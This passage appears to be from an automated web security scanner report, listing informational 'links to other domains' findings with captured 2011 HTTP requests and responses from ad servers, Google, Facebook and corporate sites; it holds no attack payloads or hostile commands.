</IFRAME><img src="http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif?media=ad&p=TcstxgAMWx0K7GS0gKhpdUhyjVXN6p1up4lDYQ&r=1793774979&rand=48992&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2,_imp.optver.27,_imp.optscore.157,_imp.optdr.0&rtbip=64.74.116.147&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKJIbMM3bHjpFaHR0cDovL3d3dy5kc2xyZXBvcnRzLmNvbS9mb3J1bS9yMjU3Mjg2NDMtTmV0dGFsay1udW1iZXItcG9ydGFiaWxpdHktQgcIoqkIEOYBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloG3WHXck_gAHDtoCeBJABx4UIoAEBqAH2igiwAQI" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

18.11. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D6977992&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:59 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4635
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/12688-127209-4062-0?mpt=6977992" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12688/127209/SP_IPv6_640x480_timer.jpg" width="640" height="480" border="0" alt="">
...[SNIP]...

18.12. http://investor.hickorytech.com/phoenix.zhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investor.hickorytech.com
Path:   /phoenix.zhtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /phoenix.zhtml?c=79055&p=irol-irhome HTTP/1.1
Host: investor.hickorytech.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=89451010.1305158342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sifrFetch=true; __utma=89451010.54388696.1305158342.1305158342.1305158342.1; __utmc=89451010; __utmb=89451010.9.10.1305158342

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 24164
Cache-Control: private, max-age=58
Date: Thu, 12 May 2011 00:02:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD41LzExLzIwMTEgODowMjowMSBQTTwvdGltZV
...[SNIP]...
</title><script language="JavaScript" src="http://media.corporate-ir.net/media_files/irol/global_js/phoenix.js"></script>
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
<body><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</a> | <a href="http://www.enventis.com/">Enventis</a> | <a href="http://www.hickorytech-is.com/">Information Solutions</a>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="15" height="1" /></td>
...[SNIP]...
<a href="phoenix.zhtml?p=irol-eventDetails&c=79055&eventID=3960325" target="_self" ><img border="0" src="http://media.corporate-ir.net/media_files/priv/ccbn/webcast/microphone2.gif" alt="Webcast Image"/></a>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="4" /></td>
...[SNIP]...
<td nowrap="nowrap">&#160;<img src="http://media.corporate-ir.net/media_files/IROL/global_images/arrow_downRed.gif" alt="Stock is Down" width="9" height="9" hspace="2" />&#160;<span class="ccbnNeg">
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="15" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<p class="ccbnTtl"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTE3MTN8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/79/79055/2010cover_104.png" target="_blank" border="0" /></a>
...[SNIP]...
<p class="ccbnTtl"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODg4MjB8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/79/79055/Apr2011InvestorUpdate.png" target="_blank" border="0" /></a>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<span class="ccbnDisclaimer"><img src="http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif" border="0" height="27" width="125" /><br/>
...[SNIP]...
<a Class="ccbnLnk"Target="_blank" href="phoenix.zhtml?c=79055&p=irol-irhome_pf"><img src="http://media.corporate-ir.net/media_files/IROL/global_images/toolkit_print_t.gif" alt="Print Page" border="0" align="middle" /></a>
...[SNIP]...
ludmVzdG9yLmhpY2tvcnl0ZWNoLmNvbS9waG9lbml4LnpodG1sP2M9NzkwNTUmcD1pcm9sLWlyaG9tZQ%3d%3d" onclick="window.open(this.href,'','scrollbars=no,status=no,width=450,height=500');return false;" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/global_images/toolkit_emailPg_t.gif" alt="E-mail Page" border="0" align="middle" /></a>
...[SNIP]...
<A HREF="phoenix.zhtml?c=79055&p=rssSubscription&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_rss_t.gif" border="0" alt="RSS Feeds" align="middle" /></A>
...[SNIP]...
<A HREF="phoenix.zhtml?c=79055&p=irol-alerts&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_alert_t.gif" border="0" alt="E-mail Alerts" /></A>
...[SNIP]...
<A HREF="phoenix.zhtml?c=79055&p=irol-contact&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_contact_t.gif" border="0" alt="IR Contacts" align="middle" /></A>
...[SNIP]...
<a Class="ccbnLnk"Target="_blank" href="Tearsheet.ashx?c=79055"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_tearSht_t.gif" border="0" alt="Financial Tear Sheet" align="middle" /></a>
...[SNIP]...

18.13. http://news.google.com/news/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/search?q=xss&hl=en&biw=925&bih=964&bav=on.2,or.r_gc.r_pw.&um=1&cf=i&sa=X&ei=FzrLTcjXN4P40gHo6qDoCA&ved=0CAoQpwUoAQ HTTP/1.1
Host: news.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=scanmedios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 01:38:59 GMT
Expires: Thu, 12 May 2011 01:38:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 76999

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=i&amp;ned=us&amp;hl=en&amp;q=xss&amp;cf=i&amp;output=rss">
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=xss&hl=en&tab=n1">YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.macworld.co.uk/business/news/index.cfm?newsid=3275580&amp;pagtype=allchandate" class="usg-AFQjCNHmUIvht6tK1d5HuQYEu1tRCttQ0A did-aa1d139acc183f97 article"><img alt="" src="http://nt0.ggpht.com/news/tbn/lBoaMOipaLcOtM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNHmUIvht6tK1d5HuQYEu1tRCttQ0A did-aa1d139acc183f97 article" href="http://www.macworld.co.uk/business/news/index.cfm?newsid=3275580&amp;pagtype=allchandate" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNHmUIvht6tK1d5HuQYEu1tRCttQ0A did-aa1d139acc183f97 article" href="http://www.macworld.co.uk/business/news/index.cfm?newsid=3275580&amp;pagtype=allchandate" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.openpr.com/news/172978/The-Netherlands-1-Real-Estate-Website-Relies-on-OUTSCAN-for-Vulnerability-Assessment-and-Management.html" class="usg-AFQjCNEQyflEMM_TbldqxuFVI_ATWAjLrw did-886ece7e54233d7 article"><img alt="" src="http://nt2.ggpht.com/news/tbn/HhlA3vFz1ZB6pM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNEQyflEMM_TbldqxuFVI_ATWAjLrw did-886ece7e54233d7 article" href="http://www.openpr.com/news/172978/The-Netherlands-1-Real-Estate-Website-Relies-on-OUTSCAN-for-Vulnerability-Assessment-and-Management.html" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNEQyflEMM_TbldqxuFVI_ATWAjLrw did-886ece7e54233d7 article" href="http://www.openpr.com/news/172978/The-Netherlands-1-Real-Estate-Website-Relies-on-OUTSCAN-for-Vulnerability-Assessment-and-Management.html" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.pchayat.com/Haber/Internet/12054/Facebookun-buyuk-ihmali" class="usg-AFQjCNFdjhn0RzwxvzDcDhb9jR5KEqGM4Q did-c89a3de19dc3084d article"><img alt="" src="http://nt2.ggpht.com/news/tbn/1jXqVRtQK7EMAM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNFdjhn0RzwxvzDcDhb9jR5KEqGM4Q did-c89a3de19dc3084d article" href="http://www.pchayat.com/Haber/Internet/12054/Facebookun-buyuk-ihmali" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNFdjhn0RzwxvzDcDhb9jR5KEqGM4Q did-c89a3de19dc3084d article" href="http://www.pchayat.com/Haber/Internet/12054/Facebookun-buyuk-ihmali" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.pchayat.com/Haber/Internet/9889/IE-8-Viruslere-karsi-SmartScreen-Filter" class="usg-AFQjCNG77CCkSVL3BzsejM2YrmcFrU9YGQ did-3d651192129e0a article"><img alt="" src="http://nt3.ggpht.com/news/tbn/F5FjO7F-cP61qM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNG77CCkSVL3BzsejM2YrmcFrU9YGQ did-3d651192129e0a article" href="http://www.pchayat.com/Haber/Internet/9889/IE-8-Viruslere-karsi-SmartScreen-Filter" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNG77CCkSVL3BzsejM2YrmcFrU9YGQ did-3d651192129e0a article" href="http://www.pchayat.com/Haber/Internet/9889/IE-8-Viruslere-karsi-SmartScreen-Filter" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.zataz.com/news/21188/sony--xss--cross-site-scripting.html" class="usg-AFQjCNFECoXjVuGXmlIpItfJKE2Ppg9zxw did-1c4b63fa999851a7 article"><img alt="" src="http://nt1.ggpht.com/news/tbn/aZJ7aWyfVQEr5M/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNFECoXjVuGXmlIpItfJKE2Ppg9zxw did-1c4b63fa999851a7 article" href="http://www.zataz.com/news/21188/sony--xss--cross-site-scripting.html" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNFECoXjVuGXmlIpItfJKE2Ppg9zxw did-1c4b63fa999851a7 article" href="http://www.zataz.com/news/21188/sony--xss--cross-site-scripting.html" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.biobiochile.cl/2011/05/02/vulnerabilidades-en-sitios-webs-bancarios-facilitaria-el-phishing.shtml" class="usg-AFQjCNFweRNT3Mizw49I5dFcVQ7sUqKkSg did-ffe85710f3286b55 article"><img alt="" src="http://nt0.ggpht.com/news/tbn/ANo1n5tGttMYUM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNFweRNT3Mizw49I5dFcVQ7sUqKkSg did-ffe85710f3286b55 article" href="http://www.biobiochile.cl/2011/05/02/vulnerabilidades-en-sitios-webs-bancarios-facilitaria-el-phishing.shtml" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNFweRNT3Mizw49I5dFcVQ7sUqKkSg did-ffe85710f3286b55 article" href="http://www.biobiochile.cl/2011/05/02/vulnerabilidades-en-sitios-webs-bancarios-facilitaria-el-phishing.shtml" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.lavozdeasturias.es/asturias/oviedo/Manual-asalto-hacker_0_467353300.html" class="usg-AFQjCNGm6m_GDV8z4NpQxXkLHTumTBH7ug did-9b0b5946a2acfab7 article"><img alt="" src="http://nt1.ggpht.com/news/tbn/PQ-bGjxtzs5UNM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNGm6m_GDV8z4NpQxXkLHTumTBH7ug did-9b0b5946a2acfab7 article" href="http://www.lavozdeasturias.es/asturias/oviedo/Manual-asalto-hacker_0_467353300.html" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNGm6m_GDV8z4NpQxXkLHTumTBH7ug did-9b0b5946a2acfab7 article" href="http://www.lavozdeasturias.es/asturias/oviedo/Manual-asalto-hacker_0_467353300.html" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.20minutos.es/noticia/1038965/0/firefox/novedades/versiones/" class="usg-AFQjCNHfixZm65w0khO9efxJtfgE-hVlFg did-e6ed13c112e75f58 article"><img alt="" src="http://nt1.ggpht.com/news/tbn/kUf4A8oelEE3mM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNHfixZm65w0khO9efxJtfgE-hVlFg did-e6ed13c112e75f58 article" href="http://www.20minutos.es/noticia/1038965/0/firefox/novedades/versiones/" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNHfixZm65w0khO9efxJtfgE-hVlFg did-e6ed13c112e75f58 article" href="http://www.20minutos.es/noticia/1038965/0/firefox/novedades/versiones/" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.peru.com/noticias/portada20110426/148881/Conozca-cual-es-el-objetivo-real-del-virus-de-Facebook---" class="usg-AFQjCNGjaZk5icny18RLw9ARNu3-eJNg1A did-f827e915a63c6a2b article"><img alt="" src="http://nt1.ggpht.com/news/tbn/NccJbJ641jl0qM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNGjaZk5icny18RLw9ARNu3-eJNg1A did-f827e915a63c6a2b article" href="http://www.peru.com/noticias/portada20110426/148881/Conozca-cual-es-el-objetivo-real-del-virus-de-Facebook---" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNGjaZk5icny18RLw9ARNu3-eJNg1A did-f827e915a63c6a2b article" href="http://www.peru.com/noticias/portada20110426/148881/Conozca-cual-es-el-objetivo-real-del-virus-de-Facebook---" id=""><span class="titletext">
...[SNIP]...
<td class="center-image"><a target="_self" href="http://www.vedomosti.ru/newsline/news/1259716/androidsmartfony_otsylayut_koordinaty_polzovatelya_v_google" class="usg-AFQjCNEIpNv8DfbCr5FR2UucZrWSb_H8YA did-b9d4719504666f25 article"><img alt="" src="http://nt3.ggpht.com/news/tbn/t5y84RQOceJuEM/1.jpg"></a>
...[SNIP]...
<h2 class="title"><a target="_self" class="usg-AFQjCNEIpNv8DfbCr5FR2UucZrWSb_H8YA did-b9d4719504666f25 article" href="http://www.vedomosti.ru/newsline/news/1259716/androidsmartfony_otsylayut_koordinaty_polzovatelya_v_google" id=""><span class="titletext">
...[SNIP]...
<p class="title"><a target="_self" class="usg-AFQjCNEIpNv8DfbCr5FR2UucZrWSb_H8YA did-b9d4719504666f25 article" href="http://www.vedomosti.ru/newsline/news/1259716/androidsmartfony_otsylayut_koordinaty_polzovatelya_v_google" id=""><span class="titletext">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=i&amp;ned=us&amp;hl=en&amp;q=xss&amp;cf=i&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

18.14. http://www.911enable.com/business/contact_specialist.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.911enable.com
Path:   /business/contact_specialist.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /business/contact_specialist.php?provenance=empty HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=r2burfmm6jqje8vo1bf8orrin2; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:07:16 GMT
Content-Length: 23673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<img src="/images/topmenu_spacer.gif"/>
<a href="https://support.connexon.com">Support</a>
...[SNIP]...
</div>
<a href="http://www.e911buzz.com" onClick="javascript: pageTracker._trackPageview ('./blog/e911buzz.php');" target="_blank" title="Visit the 911 Enable E911 Blog"> <img style="margin-left:10px; margin-top:20px; margin-bottom:15px; border:none;" src="/images/e911buzz_blog.png" alt="911 Enable E911 Blog E911 Buzz Logo" title="Visit the 911 Enable E911 Blog" />
...[SNIP]...
<div id="scanalert"><a href="https://www.scanalert.com/RatingVerify?ref=www.911enable.com"><img width="115" height="32" src="//images.scanalert.com/meter/www.911enable.com/12.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." style="border:none;" /></a>
...[SNIP]...

18.15. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.job-search-engine.com%2F&layout=standard&show_faces=false&width=315&action=like&font=verdana&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.job-search-engine.com/keyword/number-portability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.18.37
X-Cnection: close
Date: Thu, 12 May 2011 00:46:02 GMT
Content-Length: 7533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

18.16. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=scanmedios HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:37:54 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76634

<!doctype html> <head> <title>scanmedios - Google Search</title> <script>window.google={kEI:"8jnLTbDONuLL0QGwzvz4Bw",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,29795,298
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=scanmedios&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.killerstartups.com/eCommerce/scanmedios-com-global-internet-ad-network" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZtSPSQmgh_oJ:www.killerstartups.com/eCommerce/scanmedios-com-global-internet-ad-network+scanmedios&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ip-adress.com/whois/scanmedios.com" class=l onmousedown="return clk(this.href,'','','','2','','0CB8QFjAB')"><em>
...[SNIP]...
